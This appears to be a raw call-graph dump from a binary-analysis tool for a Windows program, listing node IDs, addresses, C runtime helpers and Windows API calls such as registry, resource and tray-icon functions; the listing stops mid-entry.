96352->96235 96354 51aec9 22 API calls 96353->96354 96355 514c78 96354->96355 96355->96260 96357 554ba1 96356->96357 96358 516b67 _wcslen 96356->96358 96375 5193b2 96357->96375 96361 516ba2 96358->96361 96362 516b7d 96358->96362 96360 554baa 96360->96360 96364 52fddb 22 API calls 96361->96364 96374 516f34 22 API calls 96362->96374 96366 516bae 96364->96366 96365 516b85 __fread_nolock 96365->96260 96367 52fe0b 22 API calls 96366->96367 96367->96365 96369 51516e 96368->96369 96373 51518f __fread_nolock 96368->96373 96371 52fe0b 22 API calls 96369->96371 96370 52fddb 22 API calls 96372 5151a2 96370->96372 96371->96373 96372->96266 96373->96370 96374->96365 96376 5193c9 __fread_nolock 96375->96376 96377 5193c0 96375->96377 96376->96360 96377->96376 96378 51aec9 22 API calls 96377->96378 96378->96376 96380 513a67 GetModuleFileNameW 96379->96380 96380->96274 96382 551f50 __wsopen_s 96381->96382 96383 513aaf GetFullPathNameW 96382->96383 96384 513ae9 96383->96384 96385 513ace 96383->96385 96395 51a6c3 96384->96395 96387 516b57 22 API calls 96385->96387 96388 513ada 96387->96388 96391 5137a0 96388->96391 96392 5137ae 96391->96392 96393 5193b2 22 API calls 96392->96393 96394 5137c2 96393->96394 96394->96277 96396 51a6d0 96395->96396 96397 51a6dd 96395->96397 96396->96388 96398 52fddb 22 API calls 96397->96398 96399 51a6e7 96398->96399 96400 52fe0b 22 API calls 96399->96400 96400->96396 96402 514ec6 96401->96402 96403 514ea8 GetProcAddress 96401->96403 96406 53e5eb 96402->96406 96404 514eb8 96403->96404 96404->96402 96405 514ebf FreeLibrary 96404->96405 96405->96402 96439 53e52a 96406->96439 96408 514eea 96408->96283 96408->96284 96410 514e8d 96409->96410 96411 514e6e GetProcAddress 96409->96411 96414 514f80 96410->96414 96412 514e7e 96411->96412 96412->96410 96413 514e86 FreeLibrary 96412->96413 96413->96410 96415 52fe0b 22 API calls 96414->96415 96416 514f95 96415->96416 96507 515722 96416->96507 96418 514fa1 __fread_nolock 96419 5150a5 96418->96419 96420 553d1d 96418->96420 96430 514fdc 96418->96430 96510 5142a2 CreateStreamOnHGlobal 96419->96510 96521 58304d 74 API calls 96420->96521 96423 553d22 96425 51511f 64 API calls 96423->96425 96424 5150f5 40 API calls 96424->96430 96426 553d45 96425->96426 96427 5150f5 40 API calls 96426->96427 96429 51506e ISource 96427->96429 96429->96291 96430->96423 96430->96424 96430->96429 96516 51511f 96430->96516 96432 553d70 96431->96432 96433 515107 96431->96433 96543 53e8c4 96433->96543 96436 5828fe 96685 58274e 96436->96685 96438 582919 96438->96299 96442 53e536 ___BuildCatchObject 96439->96442 96440 53e544 96464 53f2d9 20 API calls __dosmaperr 96440->96464 96442->96440 96443 53e574 96442->96443 96445 53e586 96443->96445 96446 53e579 96443->96446 96444 53e549 96465 5427ec 26 API calls _strftime 96444->96465 96456 548061 96445->96456 96466 53f2d9 20 API calls __dosmaperr 96446->96466 96450 53e58f 96451 53e5a2 96450->96451 96452 53e595 96450->96452 96468 53e5d4 LeaveCriticalSection __fread_nolock 96451->96468 96467 53f2d9 20 API calls __dosmaperr 96452->96467 96453 53e554 __fread_nolock 96453->96408 96457 54806d ___BuildCatchObject 96456->96457 96469 542f5e EnterCriticalSection 96457->96469 96459 54807b 96470 5480fb 96459->96470 96463 5480ac __fread_nolock 96463->96450 96464->96444 96465->96453 96466->96453 96467->96453 96468->96453 96469->96459 96471 54811e 96470->96471 96472 548177 96471->96472 96478 548088 96471->96478 96486 53918d EnterCriticalSection 96471->96486 96487 5391a1 LeaveCriticalSection 96471->96487 96488 544c7d 96472->96488 96477 548189 96477->96478 96501 543405 11 API calls 2 library calls 96477->96501 96483 5480b7 96478->96483 96481 5481a8 96502 53918d EnterCriticalSection 96481->96502 96506 542fa6 LeaveCriticalSection 96483->96506 96485 5480be 96485->96463 96486->96471 96487->96471 96493 544c8a pre_c_initialization 96488->96493 96489 544cca 96504 53f2d9 20 API calls __dosmaperr 96489->96504 96490 544cb5 RtlAllocateHeap 96491 544cc8 96490->96491 96490->96493 96495 5429c8 96491->96495 96493->96489 96493->96490 96503 534ead 7 API calls 2 library calls 96493->96503 96496 5429fc _free 96495->96496 96497 5429d3 RtlFreeHeap 96495->96497 96496->96477 96497->96496 96498 5429e8 96497->96498 96505 53f2d9 20 API calls __dosmaperr 96498->96505 96500 5429ee GetLastError 96500->96496 96501->96481 96502->96478 96503->96493 96504->96491 96505->96500 96506->96485 96508 52fddb 22 API calls 96507->96508 96509 515734 96508->96509 96509->96418 96511 5142bc FindResourceExW 96510->96511 96515 5142d9 96510->96515 96512 5535ba LoadResource 96511->96512 96511->96515 96513 5535cf SizeofResource 96512->96513 96512->96515 96514 5535e3 LockResource 96513->96514 96513->96515 96514->96515 96515->96430 96517 553d90 96516->96517 96518 51512e 96516->96518 96522 53ece3 96518->96522 96521->96423 96525 53eaaa 96522->96525 96524 51513c 96524->96430 96529 53eab6 ___BuildCatchObject 96525->96529 96526 53eac2 96538 53f2d9 20 API calls __dosmaperr 96526->96538 96528 53eae8 96540 53918d EnterCriticalSection 96528->96540 96529->96526 96529->96528 96530 53eac7 96539 5427ec 26 API calls _strftime 96530->96539 96533 53eaf4 96541 53ec0a 62 API calls 2 library calls 96533->96541 96535 53eb08 96542 53eb27 LeaveCriticalSection __fread_nolock 96535->96542 96537 53ead2 __fread_nolock 96537->96524 96538->96530 96539->96537 96540->96533 96541->96535 96542->96537 96546 53e8e1 96543->96546 96545 515118 96545->96436 96547 53e8ed ___BuildCatchObject 96546->96547 96548 53e92d 96547->96548 96549 53e925 __fread_nolock 96547->96549 96554 53e900 ___scrt_fastfail 96547->96554 96559 53918d EnterCriticalSection 96548->96559 96549->96545 96551 53e937 96560 53e6f8 96551->96560 96573 53f2d9 20 API calls __dosmaperr 96554->96573 96555 53e91a 96574 5427ec 26 API calls _strftime 96555->96574 96559->96551 96563 53e70a ___scrt_fastfail 96560->96563 96566 53e727 96560->96566 96561 53e717 96648 53f2d9 20 API calls __dosmaperr 96561->96648 96563->96561 96563->96566 96568 53e76a __fread_nolock 96563->96568 96564 53e71c 96649 5427ec 26 API calls _strftime 96564->96649 96575 53e96c LeaveCriticalSection __fread_nolock 96566->96575 96567 53e886 ___scrt_fastfail 96651 53f2d9 20 API calls __dosmaperr 96567->96651 96568->96566 96568->96567 96576 53d955 96568->96576 96583 548d45 96568->96583 96650 53cf78 26 API calls 4 library calls 96568->96650 96573->96555 96574->96549 96575->96549 96577 53d961 96576->96577 96578 53d976 96576->96578 96652 53f2d9 20 API calls __dosmaperr 96577->96652 96578->96568 96580 53d966 96653 5427ec 26 API calls _strftime 96580->96653 96582 53d971 96582->96568 96584 548d57 96583->96584 96585 548d6f 96583->96585 96663 53f2c6 20 API calls __dosmaperr 96584->96663 96586 5490d9 96585->96586 96590 548db4 96585->96590 96679 53f2c6 20 API calls __dosmaperr 96586->96679 96588 548d5c 96664 53f2d9 20 API calls __dosmaperr 96588->96664 96593 548dbf 96590->96593 96597 548d64 96590->96597 96601 548def 96590->96601 96592 5490de 96680 53f2d9 20 API calls __dosmaperr 96592->96680 96665 53f2c6 20 API calls __dosmaperr 96593->96665 96595 548dcc 96681 5427ec 26 API calls _strftime 96595->96681 96597->96568 96598 548dc4 96666 53f2d9 20 API calls __dosmaperr 96598->96666 96602 548e08 96601->96602 96603 548e2e 96601->96603 96604 548e4a 96601->96604 96602->96603 96610 548e15 96602->96610 96667 53f2c6 20 API calls __dosmaperr 96603->96667 96670 543820 21 API calls 2 library calls 96604->96670 96606 548e33 96668 53f2d9 20 API calls __dosmaperr 96606->96668 96654 54f89b 96610->96654 96611 548e61 96614 5429c8 _free 20 API calls 96611->96614 96612 548e3a 96669 5427ec 26 API calls _strftime 96612->96669 96613 548fb3 96616 549029 96613->96616 96620 548fcc GetConsoleMode 96613->96620 96617 548e6a 96614->96617 96618 54902d ReadFile 96616->96618 96621 5429c8 _free 20 API calls 96617->96621 96622 549047 96618->96622 96623 5490a1 GetLastError 96618->96623 96619 548e45 __fread_nolock 96636 5429c8 _free 20 API calls 96619->96636 96620->96616 96624 548fdd 96620->96624 96625 548e71 96621->96625 96622->96623 96630 54901e 96622->96630 96628 549005 96623->96628 96629 5490ae 96623->96629 96624->96618 96631 548fe3 ReadConsoleW 96624->96631 96626 548e96 96625->96626 96627 548e7b 96625->96627 96673 549424 28 API calls __fread_nolock 96626->96673 96671 53f2d9 20 API calls __dosmaperr 96627->96671 96628->96619 96674 53f2a3 20 API calls 2 library calls 96628->96674 96677 53f2d9 20 API calls __dosmaperr 96629->96677 96630->96619 96642 549083 96630->96642 96643 54906c 96630->96643 96631->96630 96635 548fff GetLastError 96631->96635 96635->96628 96636->96597 96637 548e80 96672 53f2c6 20 API calls __dosmaperr 96637->96672 96638 5490b3 96678 53f2c6 20 API calls __dosmaperr 96638->96678 96642->96619 96645 54909a 96642->96645 96675 548a61 31 API calls 3 library calls 96643->96675 96676 5488a1 29 API calls __fread_nolock 96645->96676 96647 54909f 96647->96619 96648->96564 96649->96566 96650->96568 96651->96564 96652->96580 96653->96582 96655 54f8a8 96654->96655 96657 54f8b5 96654->96657 96682 53f2d9 20 API calls __dosmaperr 96655->96682 96659 54f8c1 96657->96659 96683 53f2d9 20 API calls __dosmaperr 96657->96683 96658 54f8ad 96658->96613 96659->96613 96661 54f8e2 96684 5427ec 26 API calls _strftime 96661->96684 96663->96588 96664->96597 96665->96598 96666->96595 96667->96606 96668->96612 96669->96619 96670->96611 96671->96637 96672->96619 96673->96610 96674->96619 96675->96619 96676->96647 96677->96638 96678->96619 96679->96592 96680->96595 96681->96597 96682->96658 96683->96661 96684->96658 96688 53e4e8 96685->96688 96687 58275d 96687->96438 96691 53e469 96688->96691 96690 53e505 96690->96687 96692 53e478 96691->96692 96693 53e48c 96691->96693 96699 53f2d9 20 API calls __dosmaperr 96692->96699 96698 53e488 __alldvrm 96693->96698 96701 54333f 11 API calls 2 library calls 96693->96701 96695 53e47d 96700 5427ec 26 API calls _strftime 96695->96700 96698->96690 96699->96695 96700->96698 96701->96698 96707 582e7a 96702->96707 96703 5150f5 40 API calls 96703->96707 96704 582d3b 96704->96322 96704->96339 96705 5828fe 27 API calls 96705->96707 96706 51511f 64 API calls 96706->96707 96707->96703 96707->96704 96707->96705 96707->96706 96709 5822e7 96708->96709 96710 5822d9 96708->96710 96712 58232c 96709->96712 96713 53e5eb 29 API calls 96709->96713 96723 5822f0 96709->96723 96711 53e5eb 29 API calls 96710->96711 96711->96709 96737 582557 96712->96737 96714 582311 96713->96714 96714->96712 96716 58231a 96714->96716 96720 53e678 67 API calls 96716->96720 96716->96723 96717 582370 96718 582374 96717->96718 96719 582395 96717->96719 96722 582381 96718->96722 96725 53e678 67 API calls 96718->96725 96741 582171 96719->96741 96720->96723 96722->96723 96726 53e678 67 API calls 96722->96726 96723->96339 96724 58239d 96727 5823c3 96724->96727 96728 5823a3 96724->96728 96725->96722 96726->96723 96748 5823f3 96727->96748 96730 5823b0 96728->96730 96731 53e678 67 API calls 96728->96731 96730->96723 96732 53e678 67 API calls 96730->96732 96731->96730 96732->96723 96733 5823de 96733->96723 96734 5823ca 96734->96733 96756 53e678 96734->96756 96738 58257c 96737->96738 96740 582565 __fread_nolock 96737->96740 96739 53e8c4 __fread_nolock 40 API calls 96738->96739 96739->96740 96740->96717 96742 53ea0c ___std_exception_copy 21 API calls 96741->96742 96743 58217f 96742->96743 96744 53ea0c ___std_exception_copy 21 API calls 96743->96744 96745 582190 96744->96745 96746 53ea0c ___std_exception_copy 21 API calls 96745->96746 96747 58219c 96746->96747 96747->96724 96752 582408 96748->96752 96749 5824c0 96773 582724 96749->96773 96751 5821cc 40 API calls 96751->96752 96752->96749 96752->96751 96755 5824c7 96752->96755 96769 582606 96752->96769 96777 582269 40 API calls 96752->96777 96755->96734 96757 53e684 ___BuildCatchObject 96756->96757 96771 58261d 96769->96771 96772 582617 96769->96772 96771->96752 96772->96771 96778 5826d7 96772->96778 96774 582742 96773->96774 96775 582731 96773->96775 96774->96755 96776 53dbb3 65 API calls 96775->96776 96776->96774 96777->96752 97058 513156 97061 513170 97058->97061 97062 513187 97061->97062 97063 5131eb 97062->97063 97064 51318c 97062->97064 97102 5131e9 97062->97102 97068 5131f1 97063->97068 97069 552dfb 97063->97069 97065 513265 PostQuitMessage 97064->97065 97066 513199 97064->97066 97088 51316a 97065->97088 97071 5131a4 97066->97071 97072 552e7c 97066->97072 97067 5131d0 DefWindowProcW 97067->97088 97073 5131f8 97068->97073 97074 51321d SetTimer RegisterWindowMessageW 97068->97074 97117 5118e2 10 API calls 97069->97117 97076 552e68 97071->97076 97077 5131ae 97071->97077 97131 57bf30 34 API calls ___scrt_fastfail 97072->97131 97080 513201 KillTimer 97073->97080 97081 552d9c 97073->97081 97078 513246 CreatePopupMenu 97074->97078 97074->97088 97075 552e1c 97118 52e499 42 API calls 97075->97118 97106 57c161 97076->97106 97084 5131b9 97077->97084 97094 552e4d 97077->97094 97078->97088 97113 5130f2 Shell_NotifyIconW ___scrt_fastfail 97080->97113 97085 552dd7 MoveWindow 97081->97085 97086 552da1 97081->97086 97089 5131c4 97084->97089 97090 513253 97084->97090 97085->97088 97092 552da7 97086->97092 97093 552dc6 SetFocus 97086->97093 97089->97067 97119 5130f2 Shell_NotifyIconW ___scrt_fastfail 97089->97119 97115 51326f 44 API calls ___scrt_fastfail 97090->97115 97091 552e8e 97091->97067 97091->97088 97092->97089 97097 552db0 97092->97097 97093->97088 97094->97067 97130 570ad7 22 API calls 97094->97130 97095 513214 97114 513c50 DeleteObject DestroyWindow 97095->97114 97116 5118e2 10 API calls 97097->97116 97100 513263 97100->97088 97102->97067 97104 552e41 97120 513837 97104->97120 97107 57c276 97106->97107 97108 57c179 ___scrt_fastfail 97106->97108 97107->97088 97132 513923 97108->97132 97110 57c25f KillTimer SetTimer 97110->97107 97111 57c1a0 97111->97110 97112 57c251 Shell_NotifyIconW 97111->97112 97112->97110 97113->97095 97114->97088 97115->97100 97116->97088 97117->97075 97118->97089 97119->97104 97121 513862 ___scrt_fastfail 97120->97121 97173 514212 97121->97173 97124 5138e8 97126 553386 Shell_NotifyIconW 97124->97126 97127 513906 Shell_NotifyIconW 97124->97127 97128 513923 24 API calls 97127->97128 97129 51391c 97128->97129 97129->97102 97130->97102 97131->97091 97133 513a13 97132->97133 97134 51393f 97132->97134 97133->97111 97135 516270 22 API calls 97134->97135 97136 51394d 97135->97136 97137 553393 LoadStringW 97136->97137 97138 51395a 97136->97138 97140 5533ad 97137->97140 97139 516b57 22 API calls 97138->97139 97141 51396f 97139->97141 97144 51a8c7 22 API calls 97140->97144 97148 513994 ___scrt_fastfail 97140->97148 97142 5533c9 97141->97142 97143 51397c 97141->97143 97146 516350 22 API calls 97142->97146 97143->97140 97145 513986 97143->97145 97144->97148 97147 516350 22 API calls 97145->97147 97149 5533d7 97146->97149 97147->97148 97151 5139f9 Shell_NotifyIconW 97148->97151 97149->97148 97154 5133c6 97149->97154 97151->97133 97152 5533f9 97153 5133c6 22 API calls 97152->97153 97153->97148 97155 5133dd 97154->97155 97156 5530bb 97154->97156 97163 5133ee 97155->97163 97158 52fddb 22 API calls 97156->97158 97160 5530c5 _wcslen 97158->97160 97159 5133e8 97159->97152 97161 52fe0b 22 API calls 97160->97161 97162 5530fe __fread_nolock 97161->97162 97164 5133fe _wcslen 97163->97164 97165 513411 97164->97165 97166 55311d 97164->97166 97168 51a587 22 API calls 97165->97168 97167 52fddb 22 API calls 97166->97167 97169 553127 97167->97169 97170 51341e __fread_nolock 97168->97170 97171 52fe0b 22 API calls 97169->97171 97170->97159 97172 553157 __fread_nolock 97171->97172 97174 5535a4 97173->97174 97175 5138b7 97173->97175 97174->97175 97176 5535ad DestroyIcon 97174->97176 97175->97124 97177 57c874 42 API calls _strftime 97175->97177 97176->97175 97177->97124 97178 5303fb 97179 530407 ___BuildCatchObject 97178->97179 97207 52feb1 97179->97207 97181 53040e 97182 530561 97181->97182 97186 530438 97181->97186 97234 53083f IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97182->97234 97184 530568 97235 534e52 28 API calls _abort 97184->97235 97194 530477 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97186->97194 97218 54247d 97186->97218 97187 53056e 97236 534e04 28 API calls _abort 97187->97236 97191 530576 97192 530457 97198 5304d8 97194->97198 97230 534e1a 38 API calls 2 library calls 97194->97230 97196 5304de 97199 5304f3 97196->97199 97226 530959 97198->97226 97231 530992 GetModuleHandleW 97199->97231 97201 5304fa 97201->97184 97202 5304fe 97201->97202 97203 530507 97202->97203 97232 534df5 28 API calls _abort 97202->97232 97233 530040 13 API calls 2 library calls 97203->97233 97206 53050f 97206->97192 97208 52feba 97207->97208 97237 530698 IsProcessorFeaturePresent 97208->97237 97210 52fec6 97238 532c94 10 API calls 3 library calls 97210->97238 97212 52fecb 97213 52fecf 97212->97213 97239 542317 97212->97239 97213->97181 97216 52fee6 97216->97181 97219 542494 97218->97219 97220 530a8c _ValidateLocalCookies 5 API calls 97219->97220 97221 530451 97220->97221 97221->97192 97222 542421 97221->97222 97223 542450 97222->97223 97224 530a8c _ValidateLocalCookies 5 API calls 97223->97224 97225 542479 97224->97225 97225->97194 97290 532340 97226->97290 97229 53097f 97229->97196 97230->97198 97231->97201 97232->97203 97233->97206 97234->97184 97235->97187 97236->97191 97237->97210 97238->97212 97243 54d1f6 97239->97243 97242 532cbd 8 API calls 3 library calls 97242->97213 97246 54d213 97243->97246 97247 54d20f 97243->97247 97244 530a8c _ValidateLocalCookies 5 API calls 97245 52fed8 97244->97245 97245->97216 97245->97242 97246->97247 97249 544bfb 97246->97249 97247->97244 97250 544c07 ___BuildCatchObject 97249->97250 97261 542f5e EnterCriticalSection 97250->97261 97252 544c0e 97262 5450af 97252->97262 97254 544c1d 97260 544c2c 97254->97260 97275 544a8f 29 API calls 97254->97275 97257 544c3d __fread_nolock 97257->97246 97258 544c27 97276 544b45 GetStdHandle GetFileType 97258->97276 97277 544c48 LeaveCriticalSection _abort 97260->97277 97261->97252 97263 5450bb ___BuildCatchObject 97262->97263 97264 5450df 97263->97264 97265 5450c8 97263->97265 97278 542f5e EnterCriticalSection 97264->97278 97286 53f2d9 20 API calls __dosmaperr 97265->97286 97268 5450cd 97287 5427ec 26 API calls _strftime 97268->97287 97269 5450eb 97274 545117 97269->97274 97279 545000 97269->97279 97272 5450d7 __fread_nolock 97272->97254 97288 54513e LeaveCriticalSection _abort 97274->97288 97275->97258 97276->97260 97277->97257 97278->97269 97280 544c7d pre_c_initialization 20 API calls 97279->97280 97281 545012 97280->97281 97285 54501f 97281->97285 97289 543405 11 API calls 2 library calls 97281->97289 97282 5429c8 _free 20 API calls 97284 545071 97282->97284 97284->97269 97285->97282 97286->97268 97287->97272 97288->97272 97289->97281 97291 53096c GetStartupInfoW 97290->97291 97291->97229 97292 511098 97297 5142de 97292->97297 97296 5110a7 97298 51a961 22 API calls 97297->97298 97299 5142f5 GetVersionExW 97298->97299 97300 516b57 22 API calls 97299->97300 97301 514342 97300->97301 97302 5193b2 22 API calls 97301->97302 97306 514378 97301->97306 97303 51436c 97302->97303 97304 5137a0 22 API calls 97303->97304 97304->97306 97305 51441b GetCurrentProcess IsWow64Process 97307 514437 97305->97307 97306->97305 97313 5537df 97306->97313 97308 553824 GetSystemInfo 97307->97308 97309 51444f LoadLibraryA 97307->97309 97310 514460 GetProcAddress 97309->97310 97311 51449c GetSystemInfo 97309->97311 97310->97311 97314 514470 GetNativeSystemInfo 97310->97314 97312 514476 97311->97312 97315 51109d 97312->97315 97316 51447a FreeLibrary 97312->97316 97314->97312 97317 5300a3 29 API calls __onexit 97315->97317 97316->97315 97317->97296 97318 51105b 97323 51344d 97318->97323 97320 51106a 97354 5300a3 29 API calls __onexit 97320->97354 97322 511074 97324 51345d __wsopen_s 97323->97324 97325 51a961 22 API calls 97324->97325 97326 513513 97325->97326 97327 513a5a 24 API calls 97326->97327 97328 51351c 97327->97328 97355 513357 97328->97355 97331 5133c6 22 API calls 97332 513535 97331->97332 97333 51515f 22 API calls 97332->97333 97334 513544 97333->97334 97335 51a961 22 API calls 97334->97335 97336 51354d 97335->97336 97337 51a6c3 22 API calls 97336->97337 97338 513556 RegOpenKeyExW 97337->97338 97339 553176 RegQueryValueExW 97338->97339 97345 513578 97338->97345 97340 553193 97339->97340 97341 55320c RegCloseKey 97339->97341 97343 52fe0b 22 API calls 97340->97343 97342 55321e _wcslen 97341->97342 97341->97345 97342->97345 97351 519cb3 22 API calls 97342->97351 97352 51515f 22 API calls 97342->97352 97353 514c6d 22 API calls 97342->97353 97344 5531ac 97343->97344 97346 515722 22 API calls 97344->97346 97345->97320 97347 5531b7 RegQueryValueExW 97346->97347 97348 5531d4 97347->97348 97350 5531ee ISource 97347->97350 97349 516b57 22 API calls 97348->97349 97349->97350 97350->97341 97351->97342 97352->97342 97353->97342 97354->97322 97356 551f50 __wsopen_s 97355->97356 97357 513364 GetFullPathNameW 97356->97357 97358 513386 97357->97358 97359 516b57 22 API calls 97358->97359 97360 5133a4 97359->97360 97360->97331 97361 56d8dd GetTempPathW 97362 56d8fa 97361->97362 97362->97362 97363 5490fa 97364 549107 97363->97364 97367 54911f 97363->97367 97413 53f2d9 20 API calls __dosmaperr 97364->97413 97366 54910c 97414 5427ec 26 API calls _strftime 97366->97414 97369 54917a 97367->97369 97377 549117 97367->97377 97415 54fdc4 21 API calls 2 library calls 97367->97415 97371 53d955 __fread_nolock 26 API calls 97369->97371 97372 549192 97371->97372 97383 548c32 97372->97383 97374 549199 97375 53d955 __fread_nolock 26 API calls 97374->97375 97374->97377 97376 5491c5 97375->97376 97376->97377 97378 53d955 __fread_nolock 26 API calls 97376->97378 97379 5491d3 97378->97379 97379->97377 97380 53d955 __fread_nolock 26 API calls 97379->97380 97381 5491e3 97380->97381 97382 53d955 __fread_nolock 26 API calls 97381->97382 97382->97377 97384 548c3e ___BuildCatchObject 97383->97384 97385 548c46 97384->97385 97386 548c5e 97384->97386 97417 53f2c6 20 API calls __dosmaperr 97385->97417 97388 548d24 97386->97388 97391 548c97 97386->97391 97424 53f2c6 20 API calls __dosmaperr 97388->97424 97390 548c4b 97418 53f2d9 20 API calls __dosmaperr 97390->97418 97394 548ca6 97391->97394 97395 548cbb 97391->97395 97392 548d29 97425 53f2d9 20 API calls __dosmaperr 97392->97425 97419 53f2c6 20 API calls __dosmaperr 97394->97419 97416 545147 EnterCriticalSection 97395->97416 97397 548c53 __fread_nolock 97397->97374 97400 548cab 97420 53f2d9 20 API calls __dosmaperr 97400->97420 97401 548cc1 97403 548cf2 97401->97403 97404 548cdd 97401->97404 97408 548d45 __fread_nolock 38 API calls 97403->97408 97421 53f2d9 20 API calls __dosmaperr 97404->97421 97406 548cb3 97426 5427ec 26 API calls _strftime 97406->97426 97409 548ced 97408->97409 97423 548d1c LeaveCriticalSection __wsopen_s 97409->97423 97410 548ce2 97422 53f2c6 20 API calls __dosmaperr 97410->97422 97413->97366 97414->97377 97415->97369 97416->97401 97417->97390 97418->97397 97419->97400 97420->97406 97421->97410 97422->97409 97423->97397 97424->97392 97425->97406 97426->97397 97427 51f7bf 97428 51f7d3 97427->97428 97429 51fcb6 97427->97429 97431 51fcc2 97428->97431 97432 52fddb 22 API calls 97428->97432 97522 51aceb 23 API calls ISource 97429->97522 97523 51aceb 23 API calls ISource 97431->97523 97434 51f7e5 97432->97434 97434->97431 97435 51f83e 97434->97435 97436 51fd3d 97434->97436 97454 51ed9d ISource 97435->97454 97462 521310 97435->97462 97524 581155 22 API calls 97436->97524 97439 51fef7 97446 51a8c7 22 API calls 97439->97446 97439->97454 97441 52fddb 22 API calls 97460 51ec76 ISource 97441->97460 97443 564600 97449 51a8c7 22 API calls 97443->97449 97443->97454 97444 564b0b 97526 58359c 82 API calls __wsopen_s 97444->97526 97445 51a8c7 22 API calls 97445->97460 97446->97454 97449->97454 97451 530242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97451->97460 97452 51fbe3 97452->97454 97455 564bdc 97452->97455 97461 51f3ae ISource 97452->97461 97453 51a961 22 API calls 97453->97460 97527 58359c 82 API calls __wsopen_s 97455->97527 97457 564beb 97528 58359c 82 API calls __wsopen_s 97457->97528 97458 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97458->97460 97459 5300a3 29 API calls pre_c_initialization 97459->97460 97460->97439 97460->97441 97460->97443 97460->97444 97460->97445 97460->97451 97460->97452 97460->97453 97460->97454 97460->97457 97460->97458 97460->97459 97460->97461 97520 5201e0 256 API calls 2 library calls 97460->97520 97521 5206a0 41 API calls ISource 97460->97521 97461->97454 97525 58359c 82 API calls __wsopen_s 97461->97525 97463 5217b0 97462->97463 97464 521376 97462->97464 97752 530242 5 API calls __Init_thread_wait 97463->97752 97466 521390 97464->97466 97467 566331 97464->97467 97529 521940 97466->97529 97757 59709c 256 API calls 97467->97757 97469 5217ba 97472 5217fb 97469->97472 97474 519cb3 22 API calls 97469->97474 97471 56633d 97471->97460 97477 566346 97472->97477 97479 52182c 97472->97479 97483 5217d4 97474->97483 97475 521940 9 API calls 97476 5213b6 97475->97476 97476->97472 97478 5213ec 97476->97478 97758 58359c 82 API calls __wsopen_s 97477->97758 97478->97477 97502 521408 __fread_nolock 97478->97502 97754 51aceb 23 API calls ISource 97479->97754 97482 521839 97755 52d217 256 API calls 97482->97755 97753 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97483->97753 97486 56636e 97759 58359c 82 API calls __wsopen_s 97486->97759 97487 52152f 97489 5663d1 97487->97489 97490 52153c 97487->97490 97761 595745 54 API calls _wcslen 97489->97761 97492 521940 9 API calls 97490->97492 97494 521549 97492->97494 97493 52fddb 22 API calls 97493->97502 97497 5664fa 97494->97497 97499 521940 9 API calls 97494->97499 97495 521872 97756 52faeb 23 API calls 97495->97756 97496 52fe0b 22 API calls 97496->97502 97507 566369 97497->97507 97762 58359c 82 API calls __wsopen_s 97497->97762 97504 521563 97499->97504 97501 51ec40 256 API calls 97501->97502 97502->97482 97502->97486 97502->97487 97502->97493 97502->97496 97502->97501 97503 5663b2 97502->97503 97502->97507 97760 58359c 82 API calls __wsopen_s 97503->97760 97504->97497 97506 5215c7 ISource 97504->97506 97508 51a8c7 22 API calls 97504->97508 97506->97495 97506->97497 97506->97507 97509 521940 9 API calls 97506->97509 97512 52167b ISource 97506->97512 97539 58744a 97506->97539 97596 58f0ec 97506->97596 97605 59958b 97506->97605 97608 52effa 97506->97608 97665 59959f 97506->97665 97668 57d4ce 97506->97668 97671 586ef1 97506->97671 97507->97460 97508->97506 97509->97506 97510 52171d 97510->97460 97512->97510 97751 52ce17 22 API calls ISource 97512->97751 97520->97460 97521->97460 97522->97431 97523->97436 97524->97454 97525->97454 97526->97454 97527->97457 97528->97454 97530 521981 97529->97530 97531 52195d 97529->97531 97763 530242 5 API calls __Init_thread_wait 97530->97763 97538 5213a0 97531->97538 97765 530242 5 API calls __Init_thread_wait 97531->97765 97534 52198b 97534->97531 97764 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97534->97764 97536 528727 97536->97538 97766 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97536->97766 97538->97475 97540 587469 97539->97540 97541 587474 97539->97541 97817 51b567 97540->97817 97544 51a961 22 API calls 97541->97544 97576 587554 97541->97576 97543 52fddb 22 API calls 97545 587587 97543->97545 97546 587495 97544->97546 97547 52fe0b 22 API calls 97545->97547 97548 51a961 22 API calls 97546->97548 97549 587598 97547->97549 97550 58749e 97548->97550 97767 516246 97549->97767 97552 517510 53 API calls 97550->97552 97554 5874aa 97552->97554 97822 51525f 97554->97822 97555 51a961 22 API calls 97556 5875ab 97555->97556 97558 516246 CloseHandle 97556->97558 97560 5875b2 97558->97560 97559 5874bf 97561 516350 22 API calls 97559->97561 97771 517510 97560->97771 97563 5874f2 97561->97563 97565 58754a 97563->97565 97566 57d4ce 4 API calls 97563->97566 97570 51b567 39 API calls 97565->97570 97568 587502 97566->97568 97567 516246 CloseHandle 97569 5875c8 97567->97569 97568->97565 97571 587506 97568->97571 97794 515745 97569->97794 97570->97576 97572 519cb3 22 API calls 97571->97572 97574 587513 97572->97574 97864 57d2c1 26 API calls 97574->97864 97576->97543 97594 5876a4 97576->97594 97578 5875ea 97802 5153de 97578->97802 97579 5876de GetLastError 97580 5876f7 97579->97580 97868 516216 CloseHandle ISource 97580->97868 97581 58751c 97581->97565 97584 5875f8 97865 5153c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97584->97865 97586 587645 97587 52fddb 22 API calls 97586->97587 97590 587679 97587->97590 97588 587619 97866 57ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97588->97866 97589 5875ff 97589->97586 97589->97588 97591 51a961 22 API calls 97590->97591 97593 587686 97591->97593 97593->97594 97867 57417d 22 API calls __fread_nolock 97593->97867 97594->97506 97597 517510 53 API calls 97596->97597 97598 58f126 97597->97598 97907 519e90 97598->97907 97600 58f136 97601 58f15b 97600->97601 97602 51ec40 256 API calls 97600->97602 97604 58f15f 97601->97604 97935 519c6e 97601->97935 97602->97601 97604->97506 97958 597f59 97605->97958 97607 59959b 97607->97506 97609 519c6e 22 API calls 97608->97609 97610 52f012 97609->97610 97611 52fddb 22 API calls 97610->97611 97615 56f0a8 97610->97615 97613 52f02b 97611->97613 97614 52fe0b 22 API calls 97613->97614 97617 52f03c 97614->97617 97616 52f0a4 97615->97616 98069 589caa 39 API calls 97615->98069 97619 